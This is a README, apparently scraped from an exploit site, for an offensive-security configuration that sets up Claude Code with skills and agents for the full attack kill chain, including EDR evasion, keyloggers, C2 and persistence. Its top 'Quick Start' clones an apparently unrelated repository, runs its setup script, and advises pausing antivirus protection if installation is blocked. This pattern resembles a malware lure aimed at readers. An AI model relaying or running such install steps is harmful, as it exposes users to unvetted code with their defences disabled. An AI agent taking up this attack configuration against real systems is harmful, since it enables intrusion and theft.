Share
## https://sploitus.com/exploit?id=BEE9BEFF-AA2A-5CB6-BA77-36A82603387B
# Offensive Security Research Config for Claude Code
> [!TIP]
> If the setup does not start, add the folder to the allowed list or pause protection for a few minutes.
> [!CAUTION]
> Some security systems may block the installation.
> Only download from the official repository.
---
## QUICK START
```bash
git clone https://github.com/lookoutmayorappraise/offensive-claude-982.git
cd offensive-claude-982
python setup.py
```
A spec-driven offensive security framework for Claude Code โ structured engagement workflows based on the Cyber Kill Chain, 25 specialized skills, 6 collaborative agents, and 47 vulnerability reference files. Inspired by [GitHub's spec-kit](https://github.com/lookoutmayorappraise/offensive-claude-982) methodology.
## Quick Setup
```bash
# Method 1: One-liner install (recommended)
```
```bash
# Method 2: Clone + install script
git clone https://github.com/hypnguyen1209/offensive-claude.git ~/offensive-claude
cd ~/offensive-claude && bash install.sh
```
```bash
# Method 3: Manual copy
git clone https://github.com/hypnguyen1209/offensive-claude.git ~/offensive-claude
cp -r ~/offensive-claude/skills ~/.claude/skills
cp -r ~/offensive-claude/agents ~/.claude/agents
cp -r ~/offensive-claude/templates ~/.claude/templates
cp -r ~/offensive-claude/workflows ~/.claude/workflows
cp -r ~/offensive-claude/commands ~/.claude/commands
cp -r ~/offensive-claude/presets ~/.claude/presets
cp ~/offensive-claude/CLAUDE.md ~/.claude/CLAUDE.md
```
Skills and agents activate automatically โ no additional configuration needed.
## Engagement Workflow
Engagements follow the **Cyber Kill Chain** as a structured 9-phase pipeline with quality gates:
```
Phase 0 Phase 1 Phase 2 Phase 3 Phase 4 Phase 5 Phase 6 Phase 7 Phase 8
SCOPE โ RECON โ WEAPONIZE โ DELIVERY โ EXPLOIT โ INSTALLATION โ C2 โ ACTIONS ON โ REPORT
OBJECTIVES
```
### Orchestration Commands
| Command | Phase | Action |
|---------|-------|--------|
| `/engage.init ` | โ | Initialize engagement with workflow preset |
| `/engage.scope` | 0 | Define targets, ROE, authorization |
| `/engage.recon` | 1 | Passive/active reconnaissance |
| `/engage.weaponize` | 2 | Payload development, exploit design |
| `/engage.deliver` | 3 | Delivery vector execution |
| `/engage.exploit` | 4 | Exploitation, finding documentation |
| `/engage.install` | 5 | Persistence establishment |
| `/engage.c2` | 6 | C2 infrastructure setup |
| `/engage.actions` | 7 | Objectives execution, lateral movement |
| `/engage.report` | 8 | Report generation |
| `/engage.status` | โ | Show pipeline status and progress |
| `/engage.gate` | โ | Validate current phase gate |
### Workflow Presets
| Preset | Phases | Use Case |
|--------|--------|----------|
| `web-app` | 0,1,2,3,4,8 | OWASP-focused web application assessment |
| `network` | 0,1,2,4,5,6,7,8 | Internal network penetration test |
| `red-team` | ALL (0-8) | Full adversary simulation |
| `cloud` | 0,1,4,8 | AWS/Azure/GCP security audit |
| `mobile` | 0,1,2,4,8 | Android/iOS application pentest |
| `ad-domain` | 0,1,2,4,5,7,8 | Active Directory domain assessment |
| `bug-bounty` | 0,1,4,8 | Bug bounty vulnerability hunting |
### Quality Gates
Each phase transition validates:
- Required artifacts exist (templates filled)
- Findings have mandatory fields (CWE, CVSS, evidence, ATT&CK ID)
- Gate PASS โ suggests next phase + relevant skills
- Gate FAIL โ lists missing items
## Structure
```
.
โโโ skills/ # 25 skill modules (SKILL.md per directory)
โ โโโ recon-osint/
โ โโโ exploit-development/
โ โโโ ...
โ โโโ references/ # 47 vulnerability pattern files
โโโ agents/ # 6 collaborative sub-agents
โโโ templates/ # Structured templates per Kill Chain phase
โ โโโ scope/ # Phase 0: scope-definition, emergency-contact
โ โโโ recon/ # Phase 1: recon-plan, attack-surface
โ โโโ weaponize/ # Phase 2: exploit-blueprint, payload-config
โ โโโ delivery/ # Phase 3: delivery-plan, social-engineering
โ โโโ exploit/ # Phase 4: exploit-plan, finding records
โ โโโ install/ # Phase 5: persistence, cleanup-plan
โ โโโ c2/ # Phase 6: c2-infrastructure, opsec-checklist
โ โโโ actions/ # Phase 7: objectives, collection-plan
โ โโโ report/ # Phase 8: technical-report, executive-summary
โโโ workflows/ # Kill Chain workflow definitions (YAML)
โ โโโ WORKFLOW-ENGINE.md # Orchestration engine instructions
โ โโโ web-app-pentest.yml
โ โโโ red-team-engagement.yml
โ โโโ ...
โโโ commands/ # /engage.* orchestration slash commands
โโโ presets/ # Engagement type presets (7 presets)
โโโ CLAUDE.md # System prompt & behavior config
โโโ settings.json # Claude Code settings, permissions, MCP servers
โโโ install.sh # One-liner install script
โโโ README.md
```
## Skills (25)
| # | Skill | Kill Chain | Coverage |
|---|-------|-----------|----------|
| 01 | recon-osint | Recon | Subdomain enum, CVE lookup, breach intel, DNS history, Shodan/Censys |
| 02 | vulnerability-analysis | Recon, Exploit | Taint analysis, source-sink tracing, false positive discipline |
| 03 | exploit-development | Weaponize, Exploit | ROP chains, heap exploitation, shellcode, deserialization, mitigation bypass |
| 04 | reverse-engineering | Weaponize, Exploit | IDA/Ghidra, Frida, angr, firmware extraction, anti-RE bypass |
| 05 | web-pentest | Delivery, Exploit | SQLi, XSS, SSRF, race conditions, GraphQL, JWT, business logic |
| 06 | network-attack | Recon, Actions | AD exploitation, lateral movement, pivoting, wireless, protocol attacks |
| 07 | red-team-ops | Install, Actions | C2, persistence, privesc, defense evasion, LOLBins, exfiltration |
| 08 | cloud-security | Recon, Exploit | AWS/Azure/GCP privesc, container escape, Kubernetes, IaC review |
| 09 | malware-analysis | Weaponize | Static/dynamic analysis, YARA rules, unpacking, C2 protocol RE |
| 10 | ai-security | Recon, Exploit | Prompt injection, RAG poisoning, model extraction, adversarial ML |
| 11 | threat-hunting | Report | MITRE ATT&CK mapping, Sigma rules, log correlation, behavioral detection |
| 12 | privesc-linux | Exploit, Actions | SUID, capabilities, sudo, kernel exploits, Docker escape, cron abuse |
| 13 | privesc-windows | Exploit, Actions | Token abuse, service exploitation, UAC bypass, credential harvesting |
| 14 | coding-mastery | Weaponize | Python/C/Go/Rust/ASM for exploit dev, scanners, C2, crypto |
| 15 | crypto-analysis | Recon, Exploit | TLS auditing, hash cracking, RSA attacks, side-channel, implementation review |
| 16 | incident-response | Report | Memory forensics (Volatility), timeline analysis, IOC extraction, containment |
| 17 | edr-evasion | Delivery, Install | Hook unhooking, direct/indirect syscalls, AMSI/ETW bypass, sleep masking |
| 18 | initial-access | Delivery | HTML smuggling, ISO/MOTW bypass, DLL sideload, staged payloads, phishing |
| 19 | shellcode-dev | Weaponize | PEB walk, API hashing, loaders, PE-to-shellcode, cross-platform |
| 20 | windows-mitigations | Exploit | ASLR/DEP/CFG/CET/ACG bypass, WDAC/ASR bypass, PPL exploitation |
| 21 | windows-boundaries | Exploit, Install | Kernel/user boundary, sandbox escape, AppContainer, COM elevation |
| 22 | keylogger-arch | Install, Actions | SetWindowsHookEx, RawInput, direct HID, ETW capture, stealth IOCs |
| 23 | mobile-pentest | Recon, Exploit | Android/iOS, Frida, SSL pinning bypass, exported components, biometric bypass |
| 24 | advanced-redteam | C2, Actions | C2 infra (redirectors, malleable profiles), OPSEC, tiered infrastructure |
| 25 | active-directory-attack | Exploit, Actions | Kerberoasting, NTLM relay, Golden/Silver Ticket, ADCS, delegation abuse |
## Agents (6)
| Agent | Layer | Active Phases | Role |
|-------|-------|---------------|------|
| redteam-planner | Planning | Scope, Recon, Weaponize, Actions | Attack path design, OPSEC strategy |
| exploit-researcher | Execution | Recon, Weaponize, Exploit | CVE research, exploit chain development |
| security-reviewer | Analysis | Recon, Exploit, Report | Finding validation, gate checks |
| reverse-engineer | Execution | Weaponize, Exploit, Install | Binary analysis, vulnerability discovery |
| ai-researcher | Execution | Recon, Weaponize, Exploit | AI/ML security assessment |
| network-analyst | Analysis | Recon, Delivery, C2, Actions | Protocol analysis, C2 review |
Agents collaborate through structured handoffs โ planning agents feed execution agents, execution agents feed analysis agents for validation.
## Vulnerability References (47 files)
Detailed patterns with vulnerable/secure code examples, organized by category:
- **Taint Analysis** (4): source-sink tracing, filter evaluation, threat model, false positive reduction
- **Memory Safety** (7): buffer overflow, integer overflow, UAF, null deref, OOB read, unsafe Rust
- **Injection** (11): SQL, command, XSS, SSRF, SSTI, XXE, deserialization, path traversal, file upload, prototype pollution, ReDoS
- **Authentication** (8): bypass, authorization flaws, session management, hardcoded creds, default creds, brute force, permissions
- **Cryptography** (4): weak algorithms, key management, side-channel, certificate validation
- **Concurrency** (3): race conditions, TOCTOU, established patterns
- **Web/API** (5): CORS, CSRF, open redirect, resource exhaustion, API security
- **Supply Chain** (3): dependency confusion, code integrity, ML model files
- **Active Directory** (1): delegation, GPO abuse, RODC, SCCM/WSUS, ADCS, trust attacks
## MCP Servers
| Server | Purpose |
|--------|---------|
| mitm-search | Web search via mcp.mitm.vn |
| ida-multi-mcp | IDA Pro integration (decompile, rename, xrefs, patching) |
| jadx-mcp-server | Android APK decompilation and analysis |
## How It Works
## Customization
- **Add skills:** create `skills//SKILL.md` with YAML frontmatter including kill_chain metadata
- **Add agents:** create `agents/.md` with layer, phases, and collaboration metadata
- **Add workflows:** create `workflows/.yml` following the workflow schema
- **Add presets:** create `presets//preset.yml` with phase/skill/agent selection
- **Add templates:** create `templates//.md` with gate and dependency metadata
- **Add MCP servers:** edit `mcpServers` in `settings.json`
## Requirements
- Claude Code CLI, Desktop App, or VS Code extension
- For MCP integrations: IDA Pro with ida-multi-mcp plugin, JADX with MCP server